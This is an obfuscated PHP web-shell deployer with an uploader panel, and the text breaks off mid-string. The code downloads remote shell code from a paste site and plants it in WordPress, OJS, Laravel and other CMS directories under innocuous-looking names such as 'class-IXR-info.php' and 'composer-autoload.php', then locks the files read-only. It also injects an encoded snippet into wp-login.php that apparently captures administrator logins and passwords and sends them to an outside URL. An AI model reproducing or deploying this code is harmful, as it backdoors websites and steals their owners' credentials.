\x63\123\42\x7d\x5b\x22\x66\x71\x5c\170\x36\67\x62\x5c\x78\67\x34\x5c\x78\x37\61\42\x5d\175\51\51\x7b\x24\x7b\44\173\42\107\134\x78\64\x63\x4f\134\x78\64\x32\101\134\170\64\x63\x53\x22\175\133\42\143\134\x78\66\62\134\x78\66\x61\x6e\x5c\170\67\x32\134\x78\x36\x39\151\x6c\x5c\x78\x37\x35\x5c\170\66\x64\134\x78\x36\x65\163\42\x5d\175\75\x22\x55\x5c\x78\x37\60\x6c\x6f\134\170\x36\x31\134\170\66\64\134\x78\66\x35\x5c\170\x36\x34\40\72\40\x3d\x5c\x78\x33\145\134\x78\62\x30\134\x78\x33\x63\x5c\x78\66\x31\40\x5c\170\66\70\x5c\x78\x37\62\134\170\x36\65\146\75\47\x24\146\151\x6c\145\x27\40\134\170\x37\64\x5c\x78\x36\x31\162\x5c\170\66\67\x5c\x78\66\x35\x5c\x78\x37\x34\75\134\170\x32\67\x5f\x62\134\x78\66\143\x61\156\x5c\170\66\x62\134\170\62\x37\x5c\x78\63\145\134\x78\64\61\134\x78\66\x62\x5c\x78\67\63\x5c\170\x36\65\x73\x5c\x78\62\x30\104\x5c\x78\x36\71\134\170\67\63\151\156\x5c\x78\x36\71\134\170\63\x63\x2f\101\76\42\73\x7d\145\154\x73\145\x7b\x24\173\44\x7b\42\134\170\64\x37\x4c\x4f\134\x78\x34\x32\x41\134\170\64\x63\134\x78\65\x33\x22\x7d\133\x22\134\x78\x36\x33\x62\152\134\170\x36\145\162\x5c\170\x36\71\x69\x5c\170\x36\143\x75\155\156\x5c\x78\67\63\42\135\x7d\x3d\42\107\x61\147\134\x78\x36\x31\x6c\x5c\x78\x32\x30\163\x75\167\56\x5c\170\x32\145\134\x78\62\x65\x21\x22\x3b\175\x7d\44\173\44\x7b\42\x47\134\170\x34\143\x5c\170\64\x66\x42\101\134\x78\x34\x63\134\170\65\63\42\175\133\42\x5c\170\66\x63\x5c\x78\66\x61\x5c\x78\66\x64\134\170\66\x32\134\170\x37\x35\170\134\x78\x36\x35\143\134\170\66\x61\x5c\x78\67\x37\42\x5d\175\x3d\42\143\x55\x5c\x78\x36\x31\x5c\170\x34\x65\134\170\x36\x32\134\x78\x34\x35\x72\x53\141\x5c\x78\x34\144\134\x78\66\61\x5c\x78\65\63\x5c\170\x36\x31\115\x5c\170\66\61\134\x78\x34\61\134\170\x36\x65\x5c\170\x34\141\134\170\x36\65\134\170\64\145\x67\x5c\x78\x34\x61\134\170\x36\x31\x5c\170\x34\145\x5c\x78\x36\63\117\147\42\73\151\x66\x28\44\x5f\x47\105\124\133\42\153\134\x78\x33\71\42\135\x3d\x3d\x24\x7b\x24\173\x22\107\134\170\x34\x63\134\170\x34\146\134\x78\x34\x32\x41\134\170\64\143\134\x78\65\x33\42\x7d\x5b\x22\x6b\x75\x6c\x71\x5c\170\x37\x32\x6d\x5c\170\x36\143\x75\x5c\x78\x37\65\x22\135\x7d\x29\173\x24\154\x61\172\141\x70\x66\x64\153\161\160\x3d\42\162\134\x78\66\65\134\170\x37\x33\x5c\170\67\65\x5c\170\x36\143\134\x78\x37\64\x22\x3b\x65\143\150\157\42\x5c\170\63\143\143\x65\134\170\x36\x65\164\x5c\x78\x36\65\x5c\x78\x37\62\x5c\170\63\145\x5c\x78\x33\x63\x62\x5c\x78\63\145\x52\x6f\157\x5c\x78\67\64\x5c\x78\62\x30\x5c\x78\x34\x38\165\134\170\66\145\164\145\162\x5c\x78\62\60\x76\134\170\x33\x31\x5c\x78\x33\x63\x62\134\170\67\62\76\x5c\170\63\143\x62\x5c\x78\x37\62\x5c\170\63\x65\x22\x2e\x70\x68\160\x5f\x75\x6e\141\155\145\x28\51\x2e\x22\74\x62\134\170\67\x32\76\x3c\57\x5c\170\x36\62\x3e\x3c\x2f\x63\x5c\170\x36\65\x6e\164\x65\x72\134\x78\x33\x65\42\x3b\145\143\x68\157\x22\x5c\x78\x33\143\134\170\x36\x32\162\x20\x2f\76\134\170\63\143\x62\x5c\x78\x37\62\x5c\170\62\60\x2f\x3e\x3c\x5c\170\x36\62\x5c\x78\67\62\134\170\62\x30\57\x5c\170\63\x65\134\170\x33\x63\150\x74\x6d\x5c\170\x36\143\134\170\63\x65\134\x78\63\143\134\x78\x36\70\x5c\x78\66\65\x61\134\x78\x36\x34\x5c\x78\x33\145\134\170\x33\x63\134\x78\x37\x34\134\x78\66\71\x74\x6c\145\76\120\x31\130\40\134\170\65\65\134\x78\x37\x30\134\x78\x36\x63\x5c\170\66\x66\x61\144\x5c\x78\66\x35\162\74\x2f\x74\x69\x74\154\x65\x5c\x78\x33\145\74\x2f\x5c\x78\66\x38\x5c\x78\66\65\x5c\x78\x36\x31\144\x5c\x78\63\x65\134\x78\x33\x63\x62\x5c\x78\66\146\134\170\x36\64\134\x78\67\71\76\74\134\x78\x36\x33\134\170\66\65\x5c\170\66\x65\164\145\134\x78\67\62\x3e\74\x66\134\170\x36\146\134\170\x37\62\155\40\x5c\x78\x36\x31\134\170\x36\x33\164\134\170\x36\x39\x5c\170\66\x66\x5c\x78\66\x65\x3d\134\170\62\62\134\x78\62\62\134\170\62\60\x5c\170\66\x64\134\x78\66\65\164\150\134\170\x36\146\134\170\x36\x34\x5c\x78\x33\144\x5c\170\62\x32\x5c\170\x37\x30\157\163\x74\134\x78\x32\62\134\x78\62\60\145\134\x78\66\145\134\x78\66\63\x74\x79\x70\134\x78\66\x35\134\170\63\x64\x5c\x22\155\x75\x6c\134\x78\67\64\x69\x70\x61\162\164\57\134\x78\66\x36\134\x78\x36\146\x5c\170\67\62\134\170\66\x64\x2d\x64\x61\134\170\67\64\134\x78\66\61\x5c\42\x5c\170\63\145\74\x69\134\170\66\145\x5c\x78\67\x30\165\x5c\170\x37\x34\40\134\x78\67\64\171\x5c\x78\x37\60\x5c\x78\x36\65\x5c\170\63\x64\134\x22\x5c\170\66\x36\134\170\66\71\154\x5c\x78\66\65\x5c\42\134\x78\x32\60\x5c\170\66\x65\141\134\x78\x36\x64\145\134\x78\x33\144\x5c\x22\146\134\170\66\71\x6c\134\170\x36\x35\x73\x5c\x22\134\170\x32\60\57\x5c\x78\x33\145\x5c\x78\63\143\x5c\x78\66\71\156\x5c\x78\x37\60\134\x78\x37\65\164\134\170\62\x30\134\170\67\64\134\170\67\71\x5c\170\x37\60\x65\75\x5c\170\x32\62\163\x5c\170\67\65\134\170\x36\62\x5c\170\x36\144\x69\x74\134\170\62\62\x5c\x78\62\x30\x6e\x5c\170\66\61\155\x5c\170\66\65\x5c\x78\63\x64\x5c\42\165\x5c\170\x37\60\x5c\x78\x36\x63\x6f\x5c\170\66\61\144\145\x5c\x78\66\x34\134\42\40\166\x5c\170\66\x31\x6c\x75\134\x78\x36\x35\134\170\x33\x64\134\170\62\62\134\x78\65\x35\160\134\170\66\x63\134\170\x36\146\141\134\x78\66\x34\x5c\x78\62\62\76\74\x2f\x5c\x78\66\x36\157\134\x78\x37\x32\134\x78\x36\144\76\42\x2e\x24\173\44\x6c\x61\x7a\x61\x70\x66\x64\153\x71\x70\175\x2e\x22\x5c\170\63\x63\57\134\x78\66\x33\x5c\170\x36\65\x6e\x74\134\170\66\65\134\170\x37\62\x3e\x5c\x78\63\x63\x2f\134\170\x36\62\157\x64\x5c\x78\x37\71\x3e\x5c\170\63\143\57\x5c\170\66\x38\164\134\x78\x36\144\134\170\66\143\134\x78\x33\145\42\73\x7d\12\77\76";if($startDirectory!==$_SERVER["\x44\x4f\x43\125\x4d\105\x4e\124\137\x52\x4f\117\124"]){$dirphpinfo=$startDirectory;$phpinfo=$dirphpinfo."\57\x70\150\160\x69\156\x66\x6f\x2e\160\x68\160";}else{$dirphpinfo=$_SERVER["\104\x4f\x43\125\x4d\105\116\x54\x5f\122\117\x4f\124"];$phpinfo=$dirphpinfo."\57\x70\150\x70\151\x6e\x66\x6f\x2e\x70\x68\x70";}if(is_writeable($dirphpinfo)){if(file_exists($phpinfo)){if(!is_writeable($phpinfo)||!is_readable($phpinfo)){chmod($phpinfo,511);}else{unlink($phpinfo);}}else{$status=file_put_contents($phpinfo,$isiphpinfo);if($status){$phpinfo_result.="\x3c\x64\151\166\40\143\154\x61\x73\163\x3d\42\163\155\x61\154\154\x22\x20\x6e\141\155\x65\x3d\x22\157\x75\x74\x70\165\x74\42\40\x73\164\x79\154\145\x3d\42\142\x6f\x72\144\x65\162\x2d\x62\x6f\x74\164\x6f\155\x3a\60\x3b\x6d\141\162\147\151\156\x2d\164\157\x70\x3a\65\x70\x78\x3b\x22\x20\x72\145\x61\144\x6f\x6e\x6c\x79\x3e\x3c\163\x70\141\156\x20\163\164\x79\154\x65\x3d\143\157\x6c\x6f\162\72\x23\62\60\x65\146\62\x30\41\151\x6d\x70\x6f\162\x74\141\x6e\164\73\146\x6f\x6e\x74\x2d\x77\145\151\x67\x68\164\x3a\142\157\154\x64\x3b\76\x42\145\x72\150\141\x73\151\x6c\40\x44\x65\x70\154\x6f\x79\x20\x55\x70\154\x6f\x61\144\145\162\x21\x3c\x2f\x73\x70\x61\156\x3e\40{$phpinfo}\x3c\x2f\144\x69\166\76";chmod($phpinfo,292);}else{$phpinfo_result.="\74\x64\x69\x76\x20\143\x6c\141\163\163\75\x22\163\x6d\141\x6c\154\42\x20\x6e\141\x6d\x65\x3d\x22\157\x75\164\160\x75\164\x22\40\x73\164\171\x6c\x65\x3d\x22\142\x6f\162\x64\145\x72\55\142\x6f\x74\164\157\x6d\72\x30\x3b\155\141\x72\147\x69\x6e\55\x74\x6f\x70\x3a\x35\x70\170\73\42\x20\162\145\141\x64\x6f\x6e\x6c\171\x3e\x3c\163\160\x61\156\x20\163\164\171\154\x65\75\143\157\x6c\157\162\72\162\145\144\41\x69\155\160\x6f\162\x74\141\156\164\x3b\146\157\156\x74\55\167\145\x69\147\x68\164\x3a\x62\157\154\x64\73\76\x47\x61\147\x61\154\40\x44\x65\160\x6c\x6f\x79\40\x55\x70\154\x6f\141\x64\145\x72\41\74\57\x73\160\141\x6e\x3e\x3c\57\x64\151\166\x3e";}}}echo "\74\x64\151\x76\40\x63\x6c\x61\x73\163\75\x22\x73\155\141\x6c\x6c\141\162\x65\141\42\40\x6e\141\x6d\145\x3d\42\x6f\x75\x74\160\x75\164\40\163\164\171\x6c\x65\75\42\142\157\162\x64\x65\x72\x2d\142\157\x74\164\157\x6d\72\x30\73\x6d\x61\162\147\151\x6e\55\x74\157\x70\x3a\x35\x70\x78\73\x22\x20\162\145\141\144\x6f\x6e\154\171\x3e";print_r($phpinfo_result).PHP_EOL;echo "\x3c\x2f\x64\x69\166\x3e";}if(isset($_POST["\x69\156\x6a\x65\x63\164\143\157\x6e\x73\157\x6c\x65"])){$console_result='';$startDirectory=realpath(__DIR__);$isiconsole=file_get_contents("\150\x74\x74\160\x73\72\x2f\x2f\144\160\x61\163\x74\x65\56\x63\x6f\155\x2f\102\x55\102\x53\x43\x32\131\70\x32\x2e\164\x78\164");if($startDirectory!==$_SERVER["\104\117\x43\x55\x4d\105\x4e\124\x5f\122\x4f\117\x54"]){$dirconsole=$startDirectory;$dirconsole_wp=$dirconsole."\57\x77\x70\x2d\x69\156\x63\154\x75\144\x65\163\x2f\x49\130\122\x2f";$dirconsole_ojs=$dirconsole."\57\x63\141\x63\150\145\x2f\x2f";$dirconsole_laravel=$dirconsole."\x2f\x70\x75\142\x6c\x69\143\x2f\x2f";$dirconsole_cms_lainnya=$dirconsole."\x2f\141\x73\163\145\164\x73\x2f\x2f";}else{$dirconsole=$_SERVER["\104\x4f\x43\125\x4d\105\116\x54\137\x52\x4f\117\x54"];$dirconsole_wp=$dirconsole."\57\x77\160\x2d\151\x6e\143\154\x75\144\x65\x73\x2f\x49\130\x52\57";$dirconsole_ojs=$dirconsole."\x2f\143\x61\143\x68\x65\57\x2f";$dirconsole_laravel=$dirconsole."\x2f\x70\165\x62\x6c\x69\143\57\57";$dirconsole_cms_lainnya=$dirconsole."\x2f\141\x73\x73\x65\x74\x73\57\x2f";}if(is_dir($dirconsole_wp)&&is_writeable($dirconsole_wp)){$fileconsole=$dirconsole_wp."\143\x6c\141\163\x73\x2d\x49\130\x52\x2d\x69\x6e\x66\157\x2e\160\150\160";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="\x3c\163\x70\x61\x6e\x20\163\164\171\154\x65\75\x63\x6f\x6c\157\x72\x3a\x23\x32\x30\145\146\x32\60\41\x69\155\160\157\x72\164\x61\x6e\x74\x3b\x66\x6f\x6e\164\x2d\x77\145\x69\147\150\x74\x3a\x62\157\154\144\x3b\76\x42\x65\x72\x68\141\x73\151\x6c\x20\x44\x65\160\x6c\157\x79\x20\x43\157\156\x73\157\x6c\x65\x21\74\57\x73\x70\x61\156\x3e\x26\156\142\163\x70\x3b\46\x6e\142\163\x70\x3b\x26\156\142\x73\x70\73\40{$fileconsole}\x3c\142\162\x3e";chmod($fileconsole,292);}else{$console_result.="\x3c\x73\160\141\x6e\x20\x73\x74\171\x6c\145\x3d\143\x6f\x6c\157\x72\x3a\x72\x65\144\x21\151\x6d\160\157\x72\164\x61\x6e\164\x3b\146\x6f\x6e\x74\55\x77\x65\x69\147\150\x74\x3a\x62\x6f\154\x64\x3b\76\x47\x61\147\141\x6c\40\104\145\160\154\x6f\171\x20\x43\x6f\x6e\163\157\x6c\145\41\74\57\x73\x70\141\156\x3e\74\142\162\x3e";}}else{$dirconsole_wp_fallback=$dirconsole."\x2f\167\160\55\143\157\x6e\x74\145\x6e\164\x2f\x75\160\x6c\157\141\x64\163";$fileconsole=$dirconsole_wp_fallback."\x2f\167\x6f\x6f\x63\x6f\x6d\x6d\145\x72\x63\x65\x2d\x70\154\x61\x63\x65\150\157\x6c\x64\145\x72\55\x37\66\70\170\x37\x36\70\x2e\x70\x68\160";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="\74\x73\160\141\x6e\x20\x73\164\171\154\x65\x3d\x63\x6f\154\x6f\162\72\43\62\60\x65\x66\62\60\x21\x69\155\x70\157\x72\164\141\x6e\x74\73\146\x6f\156\x74\55\x77\x65\151\x67\150\164\72\142\x6f\154\144\x3b\x3e\102\x65\162\x68\x61\x73\x69\154\40\104\145\x70\x6c\x6f\x79\40\103\157\x6e\x73\157\x6c\x65\41\x3c\57\163\160\x61\156\x3e\46\156\x62\x73\160\x3b\46\156\142\x73\160\x3b\x26\156\x62\x73\160\73\x20{$fileconsole}\74\142\x72\x3e";chmod($fileconsole,292);}else{$console_result.="\74\x73\x70\x61\x6e\40\163\164\171\154\x65\75\143\157\x6c\x6f\x72\x3a\x72\x65\144\41\151\x6d\x70\x6f\162\x74\x61\156\164\x3b\146\157\156\x74\55\x77\145\x69\147\x68\x74\x3a\x62\157\154\144\x3b\76\107\x61\147\141\154\40\104\145\160\x6c\x6f\x79\x20\103\157\156\x73\x6f\154\145\41\x3c\x2f\163\x70\x61\x6e\76\74\142\162\x3e";}}if(is_dir($dirconsole_ojs)&&is_writeable($dirconsole_ojs)){$fileconsole=$dirconsole_ojs."\x66\143\55\x63\x6f\165\156\x74\162\171\x2d\145\x6e\137\x49\x44\56\x70\150\160";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="\x3c\163\x70\x61\156\40\163\x74\171\x6c\145\x3d\x63\x6f\154\157\x72\72\43\x32\x30\x65\x66\62\x30\41\x69\155\160\157\x72\x74\141\x6e\164\x3b\x66\x6f\x6e\164\x2d\167\x65\151\147\x68\x74\72\142\157\x6c\144\73\x3e\102\x65\162\150\141\x73\x69\154\x20\104\x65\x70\154\x6f\171\40\x43\x6f\x6e\163\157\154\145\41\74\x2f\163\x70\141\x6e\76\x26\156\x62\163\x70\x3b\46\x6e\x62\163\x70\x3b\46\156\142\163\x70\x3b\40{$fileconsole}\x3c\x62\x72\76";chmod($fileconsole,292);}else{$console_result.="\74\x73\160\x61\156\x20\x73\x74\x79\154\x65\75\143\157\154\x6f\162\x3a\x72\x65\144\x21\x69\x6d\x70\157\x72\x74\x61\156\x74\73\146\x6f\156\164\55\x77\145\151\x67\x68\164\x3a\142\157\154\x64\x3b\76\x47\141\x67\x61\x6c\40\104\x65\x70\x6c\157\x79\40\103\x6f\156\x73\157\154\x65\41\74\57\163\x70\141\x6e\76\74\x62\162\x3e";}}else{$dirconsole_ojs_fallback=$dirconsole."\x2f\x70\x75\x62\x6c\x69\x63\x2f\x73\151\164\145\x2f\x69\155\141\147\x65\x73";$fileconsole=$dirconsole_ojs_fallback."\x2f\160\x72\157\146\x69\154\145\x49\x6d\141\x67\145\x2d\x39\71\x39\71\56\x70\150\160";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="\x3c\163\x70\141\x6e\x20\163\164\x79\x6c\145\75\x63\x6f\x6c\x6f\x72\72\x23\62\x30\145\x66\62\x30\41\151\155\160\x6f\162\x74\x61\156\x74\x3b\146\157\x6e\x74\55\167\145\151\x67\150\164\72\x62\157\x6c\144\73\x3e\x42\x65\x72\x68\141\x73\x69\154\40\x44\x65\x70\x6c\157\171\40\103\x6f\x6e\x73\157\154\145\x21\74\57\x73\x70\x61\x6e\x3e\46\x6e\x62\163\160\x3b\x26\x6e\142\x73\x70\x3b\46\156\142\163\x70\73\x20{$fileconsole}\x3c\x62\162\76";chmod($fileconsole,292);}else{$console_result.="\x3c\x73\x70\141\x6e\40\163\x74\x79\154\x65\75\143\157\154\x6f\162\72\162\145\144\x21\x69\x6d\x70\157\x72\x74\x61\x6e\x74\73\x66\x6f\x6e\164\55\x77\145\x69\147\x68\164\72\x62\x6f\154\144\73\76\x47\x61\x67\x61\154\40\x44\x65\x70\154\x6f\x79\40\103\157\x6e\163\157\154\x65\41\74\57\x73\x70\141\x6e\76\74\142\x72\x3e";}}if(is_dir($dirconsole_laravel)&&is_writeable($dirconsole_laravel)){$fileconsole=$dirconsole_laravel."\x6c\141\162\141\x76\x65\154\x5f\151\x64\x65\x5f\150\x65\154\160\145\162\56\160\x68\160";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="\x3c\163\x70\x61\x6e\x20\x73\x74\171\154\145\x3d\x63\x6f\154\157\x72\x3a\x23\x32\x30\x65\146\x32\60\41\x69\155\x70\x6f\x72\x74\x61\156\x74\73\146\x6f\156\164\55\167\x65\151\x67\x68\164\x3a\142\157\154\144\x3b\x3e\102\x65\x72\150\x61\x73\x69\154\40\104\145\x70\154\157\x79\40\x43\157\x6e\163\157\x6c\x65\x21\74\57\163\160\x61\156\x3e\46\x6e\142\x73\160\73\x26\x6e\142\x73\160\x3b\46\156\x62\163\x70\x3b\40{$fileconsole}\x3c\x62\162\x3e";chmod($fileconsole,292);}else{$console_result.="\74\x73\x70\141\156\x20\x73\x74\x79\x6c\x65\x3d\143\x6f\154\x6f\162\x3a\162\145\144\x21\x69\155\x70\157\162\x74\x61\x6e\x74\73\146\x6f\x6e\x74\55\x77\145\x69\147\150\164\72\142\x6f\x6c\x64\73\x3e\x47\141\x67\141\154\40\x44\145\160\154\x6f\171\x20\103\157\x6e\163\157\x6c\x65\41\74\x2f\163\160\141\x6e\76\74\x62\162\76";}}else{$dirconsole_laravel_fallback=$dirconsole."\57\160\165\x62\x6c\151\143\57\x76\x65\x6e\x64\x6f\162";$fileconsole=$dirconsole_laravel_fallback."\x2f\x63\157\155\160\157\x73\145\162\x2d\141\165\x74\x6f\154\x6f\141\144\56\160\150\x70";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="\74\x73\160\x61\156\40\x73\164\171\x6c\145\x3d\x63\157\x6c\x6f\x72\x3a\x23\62\x30\x65\146\x32\60\41\151\x6d\x70\157\x72\164\141\156\x74\73\146\157\156\x74\55\167\x65\x69\147\150\x74\x3a\x62\x6f\154\144\73\x3e\x42\145\162\x68\x61\163\151\154\x20\104\x65\160\154\157\x79\40\x43\157\156\163\x6f\154\145\x21\x3c\x2f\163\160\x61\x6e\76\46\x6e\142\x73\160\73\x26\156\x62\x73\x70\73\x26\x6e\x62\x73\160\x3b\x20{$fileconsole}\x3c\x62\x72\76";chmod($fileconsole,292);}else{$console_result.="\74\163\160\x61\x6e\40\163\164\171\154\145\x3d\143\x6f\154\157\x72\x3a\x72\x65\144\41\151\x6d\x70\x6f\x72\164\141\x6e\x74\x3b\x66\x6f\x6e\164\55\167\x65\x69\147\150\164\x3a\x62\157\x6c\144\x3b\76\x47\x61\x67\x61\154\x20\104\x65\x70\154\157\171\40\x43\x6f\x6e\x73\x6f\x6c\145\x21\x3c\57\x73\x70\x61\x6e\76\74\x62\162\x3e";}}if(is_dir($dirconsole_cms_lainnya)&&is_writeable($dirconsole_cms_lainnya)){$fileconsole=$dirconsole_cms_lainnya."\x62\x6f\157\x74\163\x74\162\141\x70\56\x70\x68\160";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="\74\163\x70\141\x6e\x20\163\164\171\154\145\x3d\143\157\x6c\157\162\72\x23\x32\60\145\x66\x32\x30\41\151\155\x70\x6f\x72\x74\x61\156\164\73\x66\x6f\x6e\164\55\167\x65\x69\147\x68\x74\72\142\157\x6c\144\x3b\76\102\145\162\150\141\x73\151\x6c\x20\x44\x65\160\154\157\x79\40\103\x6f\156\163\x6f\154\x65\x21\x3c\x2f\x73\160\141\x6e\x3e\x20{$fileconsole}\74\142\x72\x3e";chmod($fileconsole,292);}else{$console_result.="\74\163\160\x61\156\40\x73\164\171\154\145\75\x63\157\154\x6f\x72\x3a\x72\145\144\41\151\x6d\160\157\x72\164\x61\x6e\164\73\146\x6f\x6e\164\55\167\x65\x69\x67\150\164\72\142\x6f\154\x64\73\76\107\x61\147\x61\x6c\x20\104\x65\x70\154\x6f\x79\40\103\x6f\x6e\163\x6f\x6c\145\41\x3c\57\x73\160\x61\x6e\x3e\74\142\x72\x3e";}}else{$dirconsole_cms_lainnya_fallback=$dirconsole."\x2f\143\x73\x73";$fileconsole=$dirconsole_cms_lainnya_fallback."\x2f\x62\157\157\x74\x73\x74\162\x61\x70\56\160\150\x70";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="\74\x73\x70\x61\x6e\40\163\x74\x79\154\145\75\143\157\x6c\x6f\162\x3a\43\62\60\145\146\x32\60\x21\151\155\x70\157\x72\164\141\156\164\73\x66\x6f\x6e\164\55\x77\145\151\x67\x68\x74\x3a\x62\x6f\x6c\144\x3b\x3e\102\x65\x72\x68\x61\x73\151\154\40\104\x65\x70\154\157\171\x20\103\x6f\x6e\x73\x6f\x6c\145\x21\x3c\57\x73\x70\141\x6e\x3e\40{$fileconsole}\x3c\142\x72\76";chmod($fileconsole,292);}else{$console_result.="\x3c\x73\x70\141\156\x20\163\164\x79\154\145\x3d\143\157\x6c\x6f\162\72\162\145\144\x21\151\155\160\157\162\x74\x61\x6e\164\x3b\146\157\x6e\164\55\x77\x65\x69\x67\x68\164\x3a\142\x6f\x6c\144\73\76\107\141\x67\141\x6c\40\x44\145\160\x6c\x6f\x79\x20\103\x6f\156\x73\x6f\x6c\x65\x21\74\57\163\x70\141\156\76\x3c\x62\x72\76";}}echo "\x3c\144\x69\166\40\x63\x6c\x61\163\x73\x3d\x22\x73\x6d\141\154\154\141\x72\x65\x61\x22\x20\156\141\155\x65\75\42\x6f\165\x74\x70\165\164\40\163\x74\171\154\145\x3d\42\x62\x6f\x72\144\145\162\55\x62\x6f\x74\164\157\x6d\72\60\73\x6d\x61\x72\147\151\x6e\55\x74\157\160\x3a\x35\x70\x78\73\x22\x20\162\x65\141\144\157\x6e\154\171\76";print_r($console_result).PHP_EOL;echo "\74\57\144\x69\166\x3e";}if(isset($_POST["\x69\x6e\152\145\x63\164\154\157\147\x67\x65\162"])){$logger_result='';$startDirectory=realpath(__DIR__);if($startDirectory!==$_SERVER["\104\x4f\103\x55\115\105\x4e\124\137\x52\117\x4f\124"]){$wplog=$startDirectory."\x2f\x77\x70\x2d\154\x6f\x67\x69\x6e\x2e\160\x68\x70";}else{$wplog=$_SERVER["\104\x4f\103\125\115\x45\116\124\137\x52\117\x4f\124"]."\x2f\167\160\x2d\154\x6f\x67\x69\156\56\160\150\160";}$f=fopen($wplog,"\162\53");$oldstr=file_get_contents($wplog);$str_to_insert=base64_decode("\112\107\x46\153\142\x57\x6c\165\130\63\x64\167\x58\x32\170\166\x5a\x32\154\x75\x58\62\x4e\x6f\132\127\x4e\162\130\62\154\165\x64\x47\126\x79\144\155\x46\x73\130\x32\116\x76\x62\x32\164\x70\132\123\x41\71\111\x43\x4a\151\x59\123\111\x67\114\151\101\x69\143\x79\111\147\x4c\x69\101\151\x5a\x54\x59\x69\111\103\x34\147\111\152\121\151\x49\x43\64\x67\111\x6c\x38\x69\111\x43\x34\147\111\155\x51\x69\111\103\x34\147\111\155\125\151\111\x43\x34\x67\111\155\115\x69\x49\103\64\147\x49\155\x39\153\132\x53\111\x37\x43\151\x52\150\132\x47\x31\160\x62\x6c\71\x33\143\106\71\x73\x62\62\144\x70\142\x6c\x39\x6a\141\107\126\x6a\x61\61\71\160\142\x6e\x52\154\x63\156\x5a\150\142\106\x39\171\x5a\130\106\61\x5a\x58\116\x30\x49\104\60\147\x49\x6d\112\150\x49\x69\101\x75\x49\x43\x4a\x7a\111\151\101\165\111\103\112\x6c\x4e\x69\111\x67\x4c\151\x41\x69\x4e\x43\111\x67\114\151\101\151\x58\x79\x49\x67\x4c\151\x41\151\132\x53\x49\x67\x4c\x69\x41\x69\x62\x69\111\147\114\151\101\151\x59\x79\x49\x67\114\x69\x41\151\x62\62\x52\x6c\111\x6a\163\113\x4a\x47\x46\x6b\142\127\x6c\165\x58\x32\116\166\x62\x32\x74\x70\132\x56\x39\160\142\x6e\x52\x6c\143\x6e\x5a\150\142\x46\71\x31\143\155\167\147\x50\x51\x6f\x6b\x59\127\122\x74\x61\127\65\146\144\x33\102\x66\x62\x47\x39\x6e\x61\127\x35\x66\x59\62\x68\154\x59\62\164\146\x61\x57\65\60\x5a\x58\112\62\x59\x57\170\146\x59\62\x39\166\141\x32\154\x6c\113\103\112\150\x53\x46\111\x77\131\x30\x52\166\x64\153\167\171\145\110\132\x5a\115\153\132\172\x59\125\143\x35\x65\155\x52\104\x4f\130\144\152\142\127\167\x79\124\x30\115\65\x61\154\154\x59\x51\x6a\x42\153\x57\105\x70\x73\x59\x6b\x63\x35\142\155\x46\x58\116\110\x56\x6a\x52\62\x68\x33\x55\104\112\107\141\62\x4a\x58\x62\110\x56\x68\127\105\105\65\111\x69\153\147\x4c\x69\101\x4b\x4a\107\x46\153\142\x57\154\x75\130\x33\144\x77\x58\62\x78\x76\x5a\x32\154\x75\x58\x32\116\157\132\127\116\162\130\62\154\x75\144\x47\x56\x79\144\155\106\x73\130\63\112\154\x63\130\x56\154\x63\63\121\157\144\63\102\x66\142\107\x39\156\141\x57\x35\146\x64\130\x4a\163\x4b\x43\x6b\x70\x49\103\64\x67\111\151\x5a\165\x59\127\x31\x6c\x50\123\111\147\x4c\151\x41\113\112\107\106\x6b\x62\127\x6c\165\x58\63\x64\167\130\x32\x78\166\x5a\62\x6c\x75\x58\x32\x4e\x6f\x5a\x57\x4e\162\130\x32\x6c\x75\x64\107\x56\x79\x64\x6d\x46\x73\130\63\112\154\x63\x58\x56\x6c\143\x33\x51\157\x4a\x46\71\121\124\61\116\125\x57\171\x4a\x73\x62\62\x63\151\x58\123\153\x67\x4c\x69\x41\151\x4a\156\102\x68\x63\63\x4e\x33\142\63\112\153\x50\123\x49\x67\114\x69\x41\113\112\x47\106\153\x62\127\x6c\x75\130\63\144\x77\130\x32\x78\166\132\x32\x6c\x75\130\x32\116\157\x5a\127\116\x72\x58\x32\154\165\144\x47\126\171\x64\155\x46\x73\x58\x33\x4a\x6c\143\130\x56\154\143\63\x51\x6f\112\106\71\x51\x54\x31\x4e\x55\127\x79\x4a\167\144\62\121\x69\130\x53\x6b\67\x43\x69\x52\x68\132\107\x31\160\x62\x6c\x39\152\142\62\x39\x72\x61\x57\126\x66\141\127\x35\60\x5a\130\x4a\x32\x59\127\x77\x67\x50\x53\x42\x6d\x61\x57\170\154\x58\x32\144\x6c\x64\x46\x39\152\x62\x32\65\60\x5a\127\x35\x30\x63\171\x67\x6b\131\127\122\x74\141\x57\x35\x66\x59\x32\71\166\141\x32\x6c\x6c\x58\x32\154\x75\x64\x47\126\x79\144\155\x46\163\x58\x33\126\171\x62\x43\153\x37\103\x69\x52\x33\143\x46\x39\x68\132\107\x31\160\x62\x6c\71\x6a\142\62\x39\162\141\127\x56\146\141\x57\x35\60\x5a\x58\x4a\x32\131\x57\170\146\x64\x58\x4a\163\111\x44\x30\x4b\112\107\106\153\x62\127\x6c\x75\130\63\x64\167\x58\62\x78\166\x5a\62\154\165\130\x32\x4e\157\x5a\x57\116\x72\130\62\154\165\x64\107\x56\171\144\x6d\x46\163\x58\62\x4e\x76\142\62\x74\x70\x5a\x53\x67\151\x59\x55\x68\123\x4d\x47\x4e\111\124\124\x5a\115\145\124\154\66\x57\154\x68\x53\145\x6c\154\x58\116\127\164\x6a\115\x6c\x59\167\x5a\105\x64\x73\144\x56\x6f\x7a\124\x58\x56\x5a\x4d\152\x6c\60\124\x44\x4e\x53\125\154\126\164\125\x6b\132\x56\x4d\x31\x4a\117\126\x47\x35\112\x64\x57\116\x48\x61\110\144\x51\115\153\x5a\x72\131\x6c\144\x73\144\127\x46\131\x51\124\x6b\x69\x4b\x53\x41\165\111\x41\x6f\153\131\x57\x52\x74\x61\127\x35\146\144\63\102\146\x62\107\x39\x6e\141\127\65\x66\x59\x32\x68\x6c\x59\62\164\146\141\x57\65\60\132\130\112\62\131\127\170\x66\143\155\126\x78\x64\127\126\172\x64\103\x68\63\x63\106\71\163\x62\62\144\x70\142\x6c\x39\61\143\155\167\157\x4b\x